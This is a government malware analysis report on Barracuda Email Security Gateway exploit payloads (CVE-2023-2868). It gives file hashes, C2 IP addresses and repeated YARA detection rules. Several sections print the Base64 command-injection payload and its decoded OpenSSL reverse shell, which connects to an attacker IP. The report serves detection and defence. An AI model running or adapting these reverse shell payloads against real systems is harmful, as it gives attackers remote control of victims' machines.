Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:CLEAR--Recipients may share this information without restriction. Sources may use TLP:CLEAR when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:CLEAR information may be shared without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Summary

Description

CISA obtained 14 malware samples comprised of Barracuda exploit payloads and reverse shell backdoors. The malware was used by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting versions 5.1.3.001-9.2.0.006 of Barracuda Email Security Gateway (ESG).

The payload triggers a command injection (exploiting CVE-2023-2868), leading to dropping and execution of reverse shells on the ESG appliance. The reverse shells establish backdoor communications via OpenSSL with threat actor command and control (C2) servers. The actors delivered this payload to the victim via a phishing email with a malicious .tar attachment.

For information about related malware, specifically information on other backdoors, see CISA Alert: CISA Releases Malware Analysis Reports on Barracuda Backdoors.

Download the PDF version of this report:

For a downloadable copy of IOCs associated with this MAR in JSON format, see:

Submitted Files (14)

0b917d945a7491869fa5003f6b85c09f5f45795a7852a8b63ba1abdc9797d6a6 (1665808485-0a151737759a8a30001...)

2a5de691243f2b91f164c3021c157fbd783b4f3e7d5f5950182e52ec868cd40b (abcdefgc2V0c2lkIHNoIC1jICJta2Z...)

2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095 (1665807519-0a151737759a87f0001...)

2b2b7c5e825b7a18e13319b4a1275a0dd0086abd58b2d45939269d5a613a41e7 (abcdefgc2V0c2lkIHNoIC1jICJta2Z...)

3f2ca19ad3635f379968b0302c7e42cf954f85ab61166c6f70acfebc72f38ab7 (1666612441-0a151727b565980001-...)

80342108e9f0f1fd6b5c44e88006cebe37e4eccb3a0f567636b22ad210c0a043 (1666612600-0a151727b265b10001-...)

949d4b01f31256e5e9c2b04e557dcca0a25fc2f6aa3618936befc7525e1df788 (snapshot.tar)

9d0c7a45dd00d31a9724fa9e96cb8ac99dd5a6502fe4515cedaabb2e58b1c5f5 (1666612304-0a151727b165810001-...)

b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321 (1666582925-0a151727b55a9c0001-...)

b52a9844d8368abe70b6ba0d8df84f88c8c0029dcbcf599665acd703b255d5d2 (1666583888-0a151727b45ada0001-...)

caa795c4c934219d287379b20c2912af0f815de95bb73e0f02f5fe6eb9aa50bd (1665808277-0a1517307c0bbc0001-...)

cf0996a3aee148bc060f4726435dd0d7f1af79082277f407dfa07d81181322ba (1665808153-0a1517307c0bb70001-...)

f289b565839794fe4f450ed0c9343b8fb699f97544d9af2a60851abc8b4656e0 (snapshot0.tar)

f536a7b75b7205762b75a037ebf6503029aab1a02afab14b2709797c32e7e0fa (1666614870-0a151727b166b50001-...)

IPs (2)

107[.]148[.]219[.]54

107[.]148[.]223[.]196

Findings

2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095

Tags

backdoortrojan

Details

-->

Antivirus

YARA Rules

• rule CISA_10454006_08 : trojan backdoor remote_access_trojan accesses_remote_machines communicates_with_c2
  
  {
  
     meta:
  
         Author = "CISA Code & Media Analysis"
  
         Incident = "10454006"
  
         Date = "2023-07-05"
  
         Last_Modified = "20230712_1400"
  
         Actor = "n/a"
  
         Family = "n/a"
  
         Capabilities = "accesses-remote-machines communicates-with-c2"
  
         Malware_Type = "trojan backdoor remote-access-trojan"
  
         Tool_Type = "unknown"
  
         Description = "Detects reverse shell samples in TAR files used in CVE-2023-2868 encoded block"
  
         SHA256_1 = "0b917d945a7491869fa5003f6b85c09f5f45795a7852a8b63ba1abdc9797d6a6"
  
         SHA256_2 = "2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095"
  
         SHA256_3 = "3f2ca19ad3635f379968b0302c7e42cf954f85ab61166c6f70acfebc72f38ab7"
  
         SHA256_4 = "80342108e9f0f1fd6b5c44e88006cebe37e4eccb3a0f567636b22ad210c0a043"
  
         SHA256_5 = "9d0c7a45dd00d31a9724fa9e96cb8ac99dd5a6502fe4515cedaabb2e58b1c5f5"
  
         SHA256_6 = "b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321"
  
         SHA256_7 = "b52a9844d8368abe70b6ba0d8df84f88c8c0029dcbcf599665acd703b255d5d2"
  
         SHA256_8 = "caa795c4c934219d287379b20c2912af0f815de95bb73e0f02f5fe6eb9aa50bd"
  
         SHA256_9 = "cf0996a3aee148bc060f4726435dd0d7f1af79082277f407dfa07d81181322ba"
  
         SHA256_10 = "f536a7b75b7205762b75a037ebf6503029aab1a02afab14b2709797c32e7e0fa"
  
     strings:
  
         $s1 = { 59 57 4a 6a 5a 47 56 6d 5a }
  
         $s2 = { 59 7a 4a 57 4d 47 4d 79 62 47 74 4a 53 45 35 76 53 55 4d 78 61 }
  
         $s3 = { 54 44 4e 53 64 47 4e 44 4f }
  
         $s4 = { 5a 45 63 78 64 }
  
         $s5 = { 57 54 49 35 64 57 4a 74 56 6d 70 6b }
  
         $s6 = { 53 55 52 4a 4b 30 77 79 55 6d 78 6b 61 54 6c 31 5a 46 64 34 63 }
  
         $s7 = { 4c 6e 52 34 64 41 }
  
     condition:
  
         5 of them
  
  }

ssdeep Matches

No matches found.

Relationships

Description

This file is related to the vulnerability CVE-2023-2868 in the Barracuda ESG exploit to execute a reverse shell payload on certain ESG appliances. This sample contains a Base64 encoded block that upon decoding references multiple archive files. There are multiple file references in the block, however, only one contains the exploit code in the title and can be found between two single quotes and backticks '`abcdefg=payload`' (Figure 1). This payload triggers a command injection and upon successful exploitation of the affected system the encoded commands are able to run and provide the Threat Actor (TA) with a response.

--Begin Encoded Payload--

'`abcdefg=c2V0c2lkIHNoIC1jICJta2ZpZm8gL3RtcC9wO3NoIC1pIDwvdG1wL3AgMj4mMXxvcGVuc3NsIHNfY2xpZW50IC1xdWlldCAtY29ubmVjdCAxMDcuMTQ4LjIyMy4xOTY6ODA4MCA+L3RtcC9wIDI+L2Rldi9udWxsO3JtIC90bXAvcCI=;ee=ba;G=s;"ech"o $abcdefg|${ee}se64 -d|${G}h;wh66489.txt`'

--End Encoded Payload--

The encoded block above decodes to a reverse shell seen below.

--Begin Decoded Command--

setsid sh -c "mkfifo /tmp/p;sh -i &1|openssl s_client -quiet -connect 107[.]148[.]223[.]196:8080 >/tmp/p 2>/dev/null;rm /tmp/p"

--End Decoded Command--

This reverse shell starts a new session and sets it to run in the background. Then it creates the named pipe "/tmp/p" that it will use as a point to transfer the commands that will be executed.

The rest of the command is seen using OpenSSL to create a client that connects to the Command-and-Control (C2) at Internet Protocol (IP) address “107[.]148[.]223[.]196” and port number “8080.” The OpenSSL command also suppresses session and certificate output info using -quiet flag and errors are discarded for stealth in the /dev/null directory. Finally, the named pipe "tmp/p" is removed when the OpenSSL connection is closed.

Screenshots

Figure 1. - Base64 encoded block decodes to another Base64 encoded payload.

cf0996a3aee148bc060f4726435dd0d7f1af79082277f407dfa07d81181322ba

Tags

backdoortrojan

Details

-->

Antivirus

YARA Rules

• rule CISA_10454006_08 : trojan backdoor remote_access_trojan accesses_remote_machines communicates_with_c2
  
  {
  
     meta:
  
         Author = "CISA Code & Media Analysis"
  
         Incident = "10454006"
  
         Date = "2023-07-05"
  
         Last_Modified = "20230712_1400"
  
         Actor = "n/a"
  
         Family = "n/a"
  
         Capabilities = "accesses-remote-machines communicates-with-c2"
  
         Malware_Type = "trojan backdoor remote-access-trojan"
  
         Tool_Type = "unknown"
  
         Description = "Detects reverse shell samples in TAR files used in CVE-2023-2868 encoded block"
  
         SHA256_1 = "0b917d945a7491869fa5003f6b85c09f5f45795a7852a8b63ba1abdc9797d6a6"
  
         SHA256_2 = "2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095"
  
         SHA256_3 = "3f2ca19ad3635f379968b0302c7e42cf954f85ab61166c6f70acfebc72f38ab7"
  
         SHA256_4 = "80342108e9f0f1fd6b5c44e88006cebe37e4eccb3a0f567636b22ad210c0a043"
  
         SHA256_5 = "9d0c7a45dd00d31a9724fa9e96cb8ac99dd5a6502fe4515cedaabb2e58b1c5f5"
  
         SHA256_6 = "b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321"
  
         SHA256_7 = "b52a9844d8368abe70b6ba0d8df84f88c8c0029dcbcf599665acd703b255d5d2"
  
         SHA256_8 = "caa795c4c934219d287379b20c2912af0f815de95bb73e0f02f5fe6eb9aa50bd"
  
         SHA256_9 = "cf0996a3aee148bc060f4726435dd0d7f1af79082277f407dfa07d81181322ba"
  
         SHA256_10 = "f536a7b75b7205762b75a037ebf6503029aab1a02afab14b2709797c32e7e0fa"
  
     strings:
  
         $s1 = { 59 57 4a 6a 5a 47 56 6d 5a }
  
         $s2 = { 59 7a 4a 57 4d 47 4d 79 62 47 74 4a 53 45 35 76 53 55 4d 78 61 }
  
         $s3 = { 54 44 4e 53 64 47 4e 44 4f }
  
         $s4 = { 5a 45 63 78 64 }
  
         $s5 = { 57 54 49 35 64 57 4a 74 56 6d 70 6b }
  
         $s6 = { 53 55 52 4a 4b 30 77 79 55 6d 78 6b 61 54 6c 31 5a 46 64 34 63 }
  
         $s7 = { 4c 6e 52 34 64 41 }
  
     condition:
  
         5 of them
  
  }

ssdeep Matches

No matches found.

Relationships

Description

This artifact contains the same payloads as “2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095.”

caa795c4c934219d287379b20c2912af0f815de95bb73e0f02f5fe6eb9aa50bd

Tags

backdoortrojan

Details

-->

Antivirus

YARA Rules

• rule CISA_10454006_08 : trojan backdoor remote_access_trojan accesses_remote_machines communicates_with_c2
  
  {
  
     meta:
  
         Author = "CISA Code & Media Analysis"
  
         Incident = "10454006"
  
         Date = "2023-07-05"
  
         Last_Modified = "20230712_1400"
  
         Actor = "n/a"
  
         Family = "n/a"
  
         Capabilities = "accesses-remote-machines communicates-with-c2"
  
         Malware_Type = "trojan backdoor remote-access-trojan"
  
         Tool_Type = "unknown"
  
         Description = "Detects reverse shell samples in TAR files used in CVE-2023-2868 encoded block"
  
         SHA256_1 = "0b917d945a7491869fa5003f6b85c09f5f45795a7852a8b63ba1abdc9797d6a6"
  
         SHA256_2 = "2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095"
  
         SHA256_3 = "3f2ca19ad3635f379968b0302c7e42cf954f85ab61166c6f70acfebc72f38ab7"
  
         SHA256_4 = "80342108e9f0f1fd6b5c44e88006cebe37e4eccb3a0f567636b22ad210c0a043"
  
         SHA256_5 = "9d0c7a45dd00d31a9724fa9e96cb8ac99dd5a6502fe4515cedaabb2e58b1c5f5"
  
         SHA256_6 = "b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321"
  
         SHA256_7 = "b52a9844d8368abe70b6ba0d8df84f88c8c0029dcbcf599665acd703b255d5d2"
  
         SHA256_8 = "caa795c4c934219d287379b20c2912af0f815de95bb73e0f02f5fe6eb9aa50bd"
  
         SHA256_9 = "cf0996a3aee148bc060f4726435dd0d7f1af79082277f407dfa07d81181322ba"
  
         SHA256_10 = "f536a7b75b7205762b75a037ebf6503029aab1a02afab14b2709797c32e7e0fa"
  
     strings:
  
         $s1 = { 59 57 4a 6a 5a 47 56 6d 5a }
  
         $s2 = { 59 7a 4a 57 4d 47 4d 79 62 47 74 4a 53 45 35 76 53 55 4d 78 61 }
  
         $s3 = { 54 44 4e 53 64 47 4e 44 4f }
  
         $s4 = { 5a 45 63 78 64 }
  
         $s5 = { 57 54 49 35 64 57 4a 74 56 6d 70 6b }
  
         $s6 = { 53 55 52 4a 4b 30 77 79 55 6d 78 6b 61 54 6c 31 5a 46 64 34 63 }
  
         $s7 = { 4c 6e 52 34 64 41 }
  
     condition:
  
         5 of them
  
  }

ssdeep Matches

No matches found.

Relationships

Description

This artifact contains the same payloads as “2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095.”

0b917d945a7491869fa5003f6b85c09f5f45795a7852a8b63ba1abdc9797d6a6

Tags

backdoortrojan

Details

-->

Antivirus

YARA Rules

• rule CISA_10454006_08 : trojan backdoor remote_access_trojan accesses_remote_machines communicates_with_c2
  
  {
  
     meta:
  
         Author = "CISA Code & Media Analysis"
  
         Incident = "10454006"
  
         Date = "2023-07-05"
  
         Last_Modified = "20230712_1400"
  
         Actor = "n/a"
  
         Family = "n/a"
  
         Capabilities = "accesses-remote-machines communicates-with-c2"
  
         Malware_Type = "trojan backdoor remote-access-trojan"
  
         Tool_Type = "unknown"
  
         Description = "Detects reverse shell samples in TAR files used in CVE-2023-2868 encoded block"
  
         SHA256_1 = "0b917d945a7491869fa5003f6b85c09f5f45795a7852a8b63ba1abdc9797d6a6"
  
         SHA256_2 = "2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095"
  
         SHA256_3 = "3f2ca19ad3635f379968b0302c7e42cf954f85ab61166c6f70acfebc72f38ab7"
  
         SHA256_4 = "80342108e9f0f1fd6b5c44e88006cebe37e4eccb3a0f567636b22ad210c0a043"
  
         SHA256_5 = "9d0c7a45dd00d31a9724fa9e96cb8ac99dd5a6502fe4515cedaabb2e58b1c5f5"
  
         SHA256_6 = "b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321"
  
         SHA256_7 = "b52a9844d8368abe70b6ba0d8df84f88c8c0029dcbcf599665acd703b255d5d2"
  
         SHA256_8 = "caa795c4c934219d287379b20c2912af0f815de95bb73e0f02f5fe6eb9aa50bd"
  
         SHA256_9 = "cf0996a3aee148bc060f4726435dd0d7f1af79082277f407dfa07d81181322ba"
  
         SHA256_10 = "f536a7b75b7205762b75a037ebf6503029aab1a02afab14b2709797c32e7e0fa"
  
     strings:
  
         $s1 = { 59 57 4a 6a 5a 47 56 6d 5a }
  
         $s2 = { 59 7a 4a 57 4d 47 4d 79 62 47 74 4a 53 45 35 76 53 55 4d 78 61 }
  
         $s3 = { 54 44 4e 53 64 47 4e 44 4f }
  
         $s4 = { 5a 45 63 78 64 }
  
         $s5 = { 57 54 49 35 64 57 4a 74 56 6d 70 6b }
  
         $s6 = { 53 55 52 4a 4b 30 77 79 55 6d 78 6b 61 54 6c 31 5a 46 64 34 63 }
  
         $s7 = { 4c 6e 52 34 64 41 }
  
     condition:
  
         5 of them
  
  }

ssdeep Matches

No matches found.

Relationships

Description

This artifact contains the same payloads as “2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095.”

b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321

Tags

backdoortrojan

Details

-->

Antivirus

YARA Rules

• rule CISA_10454006_08 : trojan backdoor remote_access_trojan accesses_remote_machines communicates_with_c2
  
  {
  
     meta:
  
         Author = "CISA Code & Media Analysis"
  
         Incident = "10454006"
  
         Date = "2023-07-05"
  
         Last_Modified = "20230712_1400"
  
         Actor = "n/a"
  
         Family = "n/a"
  
         Capabilities = "accesses-remote-machines communicates-with-c2"
  
         Malware_Type = "trojan backdoor remote-access-trojan"
  
         Tool_Type = "unknown"
  
         Description = "Detects reverse shell samples in TAR files used in CVE-2023-2868 encoded block"
  
         SHA256_1 = "0b917d945a7491869fa5003f6b85c09f5f45795a7852a8b63ba1abdc9797d6a6"
  
         SHA256_2 = "2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095"
  
         SHA256_3 = "3f2ca19ad3635f379968b0302c7e42cf954f85ab61166c6f70acfebc72f38ab7"
  
         SHA256_4 = "80342108e9f0f1fd6b5c44e88006cebe37e4eccb3a0f567636b22ad210c0a043"
  
         SHA256_5 = "9d0c7a45dd00d31a9724fa9e96cb8ac99dd5a6502fe4515cedaabb2e58b1c5f5"
  
         SHA256_6 = "b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321"
  
         SHA256_7 = "b52a9844d8368abe70b6ba0d8df84f88c8c0029dcbcf599665acd703b255d5d2"
  
         SHA256_8 = "caa795c4c934219d287379b20c2912af0f815de95bb73e0f02f5fe6eb9aa50bd"
  
         SHA256_9 = "cf0996a3aee148bc060f4726435dd0d7f1af79082277f407dfa07d81181322ba"
  
         SHA256_10 = "f536a7b75b7205762b75a037ebf6503029aab1a02afab14b2709797c32e7e0fa"
  
     strings:
  
         $s1 = { 59 57 4a 6a 5a 47 56 6d 5a }
  
         $s2 = { 59 7a 4a 57 4d 47 4d 79 62 47 74 4a 53 45 35 76 53 55 4d 78 61 }
  
         $s3 = { 54 44 4e 53 64 47 4e 44 4f }
  
         $s4 = { 5a 45 63 78 64 }
  
         $s5 = { 57 54 49 35 64 57 4a 74 56 6d 70 6b }
  
         $s6 = { 53 55 52 4a 4b 30 77 79 55 6d 78 6b 61 54 6c 31 5a 46 64 34 63 }
  
         $s7 = { 4c 6e 52 34 64 41 }
  
     condition:
  
         5 of them
  
  }

ssdeep Matches

No matches found.

Relationships

Description

This artifact contains a payload that exploits CVE-2023-2868. The exploit payload is a shell script code with an embedded Base64 encoded reverse shell. Upon execution the malware Base64 decodes and executes the reverse shell code. The reverse shell establishes connections using the "OpenSSL" to the C2 IP "107[.]148[.]223[.]196" and port “443” and redirects the standard input and output to the named pipe at "/tmp/p" and then removes "/tmp/p" after the connection is closed.

--Begin Encoded Payload--

'`abcdefg=c2V0c2lkIHNoIC1jICJta2ZpZm8gL3RtcC9wO3NoIC1pIDwvdG1wL3AgMj4mMXxvcGVuc3NsIHNfY2xpZW50IC1xdWlldCAtY29ubmVjdCAxMDcuMTQ4LjIyMy4xOTY6NDQzID4vdG1wL3AgMj4vZGV2L251bGw7cm0gL3RtcC9wIg==;ee=ba;G=s;"ech"o $abcdefg|${ee}se64 -d|${G}h;wh66489.txt`'

--End Encoded Payload--

--Begin Decoded Payload--

setsid sh -c "mkfifo /tmp/p;sh -i &1|openssl s_client -quiet -connect 107[.]148[.]223[.]196:443 >/tmp/p 2>/dev/null;rm /tmp/p"

--End Decoded Payload--

b52a9844d8368abe70b6ba0d8df84f88c8c0029dcbcf599665acd703b255d5d2

Tags

backdoortrojan

Details

-->

Antivirus

YARA Rules

• rule CISA_10454006_08 : trojan backdoor remote_access_trojan accesses_remote_machines communicates_with_c2
  
  {
  
     meta:
  
         Author = "CISA Code & Media Analysis"
  
         Incident = "10454006"
  
         Date = "2023-07-05"
  
         Last_Modified = "20230712_1400"
  
         Actor = "n/a"
  
         Family = "n/a"
  
         Capabilities = "accesses-remote-machines communicates-with-c2"
  
         Malware_Type = "trojan backdoor remote-access-trojan"
  
         Tool_Type = "unknown"
  
         Description = "Detects reverse shell samples in TAR files used in CVE-2023-2868 encoded block"
  
         SHA256_1 = "0b917d945a7491869fa5003f6b85c09f5f45795a7852a8b63ba1abdc9797d6a6"
  
         SHA256_2 = "2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095"
  
         SHA256_3 = "3f2ca19ad3635f379968b0302c7e42cf954f85ab61166c6f70acfebc72f38ab7"
  
         SHA256_4 = "80342108e9f0f1fd6b5c44e88006cebe37e4eccb3a0f567636b22ad210c0a043"
  
         SHA256_5 = "9d0c7a45dd00d31a9724fa9e96cb8ac99dd5a6502fe4515cedaabb2e58b1c5f5"
  
         SHA256_6 = "b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321"
  
         SHA256_7 = "b52a9844d8368abe70b6ba0d8df84f88c8c0029dcbcf599665acd703b255d5d2"
  
         SHA256_8 = "caa795c4c934219d287379b20c2912af0f815de95bb73e0f02f5fe6eb9aa50bd"
  
         SHA256_9 = "cf0996a3aee148bc060f4726435dd0d7f1af79082277f407dfa07d81181322ba"
  
         SHA256_10 = "f536a7b75b7205762b75a037ebf6503029aab1a02afab14b2709797c32e7e0fa"
  
     strings:
  
         $s1 = { 59 57 4a 6a 5a 47 56 6d 5a }
  
         $s2 = { 59 7a 4a 57 4d 47 4d 79 62 47 74 4a 53 45 35 76 53 55 4d 78 61 }
  
         $s3 = { 54 44 4e 53 64 47 4e 44 4f }
  
         $s4 = { 5a 45 63 78 64 }
  
         $s5 = { 57 54 49 35 64 57 4a 74 56 6d 70 6b }
  
         $s6 = { 53 55 52 4a 4b 30 77 79 55 6d 78 6b 61 54 6c 31 5a 46 64 34 63 }
  
         $s7 = { 4c 6e 52 34 64 41 }
  
     condition:
  
         5 of them
  
  }

ssdeep Matches

No matches found.

Relationships

Description

This artifact contains the same payloads as “b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321.”

9d0c7a45dd00d31a9724fa9e96cb8ac99dd5a6502fe4515cedaabb2e58b1c5f5

Tags

backdoortrojan

Details

-->

Antivirus

YARA Rules

• rule CISA_10454006_08 : trojan backdoor remote_access_trojan accesses_remote_machines communicates_with_c2
  
  {
  
     meta:
  
         Author = "CISA Code & Media Analysis"
  
         Incident = "10454006"
  
         Date = "2023-07-05"
  
         Last_Modified = "20230712_1400"
  
         Actor = "n/a"
  
         Family = "n/a"
  
         Capabilities = "accesses-remote-machines communicates-with-c2"
  
         Malware_Type = "trojan backdoor remote-access-trojan"
  
         Tool_Type = "unknown"
  
         Description = "Detects reverse shell samples in TAR files used in CVE-2023-2868 encoded block"
  
         SHA256_1 = "0b917d945a7491869fa5003f6b85c09f5f45795a7852a8b63ba1abdc9797d6a6"
  
         SHA256_2 = "2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095"
  
         SHA256_3 = "3f2ca19ad3635f379968b0302c7e42cf954f85ab61166c6f70acfebc72f38ab7"
  
         SHA256_4 = "80342108e9f0f1fd6b5c44e88006cebe37e4eccb3a0f567636b22ad210c0a043"
  
         SHA256_5 = "9d0c7a45dd00d31a9724fa9e96cb8ac99dd5a6502fe4515cedaabb2e58b1c5f5"
  
         SHA256_6 = "b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321"
  
         SHA256_7 = "b52a9844d8368abe70b6ba0d8df84f88c8c0029dcbcf599665acd703b255d5d2"
  
         SHA256_8 = "caa795c4c934219d287379b20c2912af0f815de95bb73e0f02f5fe6eb9aa50bd"
  
         SHA256_9 = "cf0996a3aee148bc060f4726435dd0d7f1af79082277f407dfa07d81181322ba"
  
         SHA256_10 = "f536a7b75b7205762b75a037ebf6503029aab1a02afab14b2709797c32e7e0fa"
  
     strings:
  
         $s1 = { 59 57 4a 6a 5a 47 56 6d 5a }
  
         $s2 = { 59 7a 4a 57 4d 47 4d 79 62 47 74 4a 53 45 35 76 53 55 4d 78 61 }
  
         $s3 = { 54 44 4e 53 64 47 4e 44 4f }
  
         $s4 = { 5a 45 63 78 64 }
  
         $s5 = { 57 54 49 35 64 57 4a 74 56 6d 70 6b }
  
         $s6 = { 53 55 52 4a 4b 30 77 79 55 6d 78 6b 61 54 6c 31 5a 46 64 34 63 }
  
         $s7 = { 4c 6e 52 34 64 41 }
  
     condition:
  
         5 of them
  
  }

ssdeep Matches

No matches found.

Relationships

Description

This artifact contains the same payloads as “b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321.”

3f2ca19ad3635f379968b0302c7e42cf954f85ab61166c6f70acfebc72f38ab7

Tags

backdoortrojan

Details

-->

Antivirus

YARA Rules

• rule CISA_10454006_08 : trojan backdoor remote_access_trojan accesses_remote_machines communicates_with_c2
  
  {
  
     meta:
  
         Author = "CISA Code & Media Analysis"
  
         Incident = "10454006"
  
         Date = "2023-07-05"
  
         Last_Modified = "20230712_1400"
  
         Actor = "n/a"
  
         Family = "n/a"
  
         Capabilities = "accesses-remote-machines communicates-with-c2"
  
         Malware_Type = "trojan backdoor remote-access-trojan"
  
         Tool_Type = "unknown"
  
         Description = "Detects reverse shell samples in TAR files used in CVE-2023-2868 encoded block"
  
         SHA256_1 = "0b917d945a7491869fa5003f6b85c09f5f45795a7852a8b63ba1abdc9797d6a6"
  
         SHA256_2 = "2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095"
  
         SHA256_3 = "3f2ca19ad3635f379968b0302c7e42cf954f85ab61166c6f70acfebc72f38ab7"
  
         SHA256_4 = "80342108e9f0f1fd6b5c44e88006cebe37e4eccb3a0f567636b22ad210c0a043"
  
         SHA256_5 = "9d0c7a45dd00d31a9724fa9e96cb8ac99dd5a6502fe4515cedaabb2e58b1c5f5"
  
         SHA256_6 = "b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321"
  
         SHA256_7 = "b52a9844d8368abe70b6ba0d8df84f88c8c0029dcbcf599665acd703b255d5d2"
  
         SHA256_8 = "caa795c4c934219d287379b20c2912af0f815de95bb73e0f02f5fe6eb9aa50bd"
  
         SHA256_9 = "cf0996a3aee148bc060f4726435dd0d7f1af79082277f407dfa07d81181322ba"
  
         SHA256_10 = "f536a7b75b7205762b75a037ebf6503029aab1a02afab14b2709797c32e7e0fa"
  
     strings:
  
         $s1 = { 59 57 4a 6a 5a 47 56 6d 5a }
  
         $s2 = { 59 7a 4a 57 4d 47 4d 79 62 47 74 4a 53 45 35 76 53 55 4d 78 61 }
  
         $s3 = { 54 44 4e 53 64 47 4e 44 4f }
  
         $s4 = { 5a 45 63 78 64 }
  
         $s5 = { 57 54 49 35 64 57 4a 74 56 6d 70 6b }
  
         $s6 = { 53 55 52 4a 4b 30 77 79 55 6d 78 6b 61 54 6c 31 5a 46 64 34 63 }
  
         $s7 = { 4c 6e 52 34 64 41 }
  
     condition:
  
         5 of them
  
  }

ssdeep Matches

No matches found.

Relationships

Description

This artifact contains the same payloads as “b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321.”

80342108e9f0f1fd6b5c44e88006cebe37e4eccb3a0f567636b22ad210c0a043

Tags

backdoortrojan

Details

-->

Antivirus

YARA Rules

• rule CISA_10454006_08 : trojan backdoor remote_access_trojan accesses_remote_machines communicates_with_c2
  
  {
  
     meta:
  
         Author = "CISA Code & Media Analysis"
  
         Incident = "10454006"
  
         Date = "2023-07-05"
  
         Last_Modified = "20230712_1400"
  
         Actor = "n/a"
  
         Family = "n/a"
  
         Capabilities = "accesses-remote-machines communicates-with-c2"
  
         Malware_Type = "trojan backdoor remote-access-trojan"
  
         Tool_Type = "unknown"
  
         Description = "Detects reverse shell samples in TAR files used in CVE-2023-2868 encoded block"
  
         SHA256_1 = "0b917d945a7491869fa5003f6b85c09f5f45795a7852a8b63ba1abdc9797d6a6"
  
         SHA256_2 = "2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095"
  
         SHA256_3 = "3f2ca19ad3635f379968b0302c7e42cf954f85ab61166c6f70acfebc72f38ab7"
  
         SHA256_4 = "80342108e9f0f1fd6b5c44e88006cebe37e4eccb3a0f567636b22ad210c0a043"
  
         SHA256_5 = "9d0c7a45dd00d31a9724fa9e96cb8ac99dd5a6502fe4515cedaabb2e58b1c5f5"
  
         SHA256_6 = "b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321"
  
         SHA256_7 = "b52a9844d8368abe70b6ba0d8df84f88c8c0029dcbcf599665acd703b255d5d2"
  
         SHA256_8 = "caa795c4c934219d287379b20c2912af0f815de95bb73e0f02f5fe6eb9aa50bd"
  
         SHA256_9 = "cf0996a3aee148bc060f4726435dd0d7f1af79082277f407dfa07d81181322ba"
  
         SHA256_10 = "f536a7b75b7205762b75a037ebf6503029aab1a02afab14b2709797c32e7e0fa"
  
     strings:
  
         $s1 = { 59 57 4a 6a 5a 47 56 6d 5a }
  
         $s2 = { 59 7a 4a 57 4d 47 4d 79 62 47 74 4a 53 45 35 76 53 55 4d 78 61 }
  
         $s3 = { 54 44 4e 53 64 47 4e 44 4f }
  
         $s4 = { 5a 45 63 78 64 }
  
         $s5 = { 57 54 49 35 64 57 4a 74 56 6d 70 6b }
  
         $s6 = { 53 55 52 4a 4b 30 77 79 55 6d 78 6b 61 54 6c 31 5a 46 64 34 63 }
  
         $s7 = { 4c 6e 52 34 64 41 }
  
     condition:
  
         5 of them
  
  }

ssdeep Matches

No matches found.

Relationships

Description

This artifact contains the same payloads as “b5113e29ec23f6e1be289b99dc7ac2af1c252b4b6ff6e977f7827ab7fd686321.”

f536a7b75b7205762b75a037ebf6503029aab1a02afab14b2709797c32e7e0fa

Tags

backdoortrojan

Details

-->

Antivirus

YARA Rules

• rule CISA_10454006_08 : trojan backdoor remote_access_trojan accesses_remote_machines communicates_with_c2
  
  {
  
     meta:
  
         Author = "CISA Code & Media Analysis"
  
         Incident = "10454006"
  
         Date = "2023-07-05"
  
         Last_Modified = "20230712_1400"
  
         Actor = "n/a"
  
         Family = "n/a"
  
         Capabilities = "accesses-remote-machines communicates-with-c2"
  
         Malware_Type = "trojan backdoor remote-access-trojan"
  
         Tool_Type = "unknown"
  
         Description = "Detects reverse shell samples in TAR files used in CVE-2023-2868 encoded block"
  
         SHA256_1 = "0b917d945a7491869fa5003f6b85c09f5f45795a7852a8b63ba1abdc9797d6a6"
  
         SHA256_2 = "2a860849a9e68df0053556b85f20010a1384b4c87594ba4f9bb3e1b1d287b095"
  
         SHA256_3 = "3f2ca19ad3635f379968b0302c7e42cf954f85ab61166c6f70acfebc72f38ab7"
  
         SHA256_4 = "80342108e9f0f1fd6b5c44e88006cebe37e4eccb3a0f567636b22ad210c0a043"
  
         SHA256_5 = "9d0c7a45dd00d31a9724fa9e96cb8ac99dd5a6502fe4515cedaabb2e58b1c5f5"
  
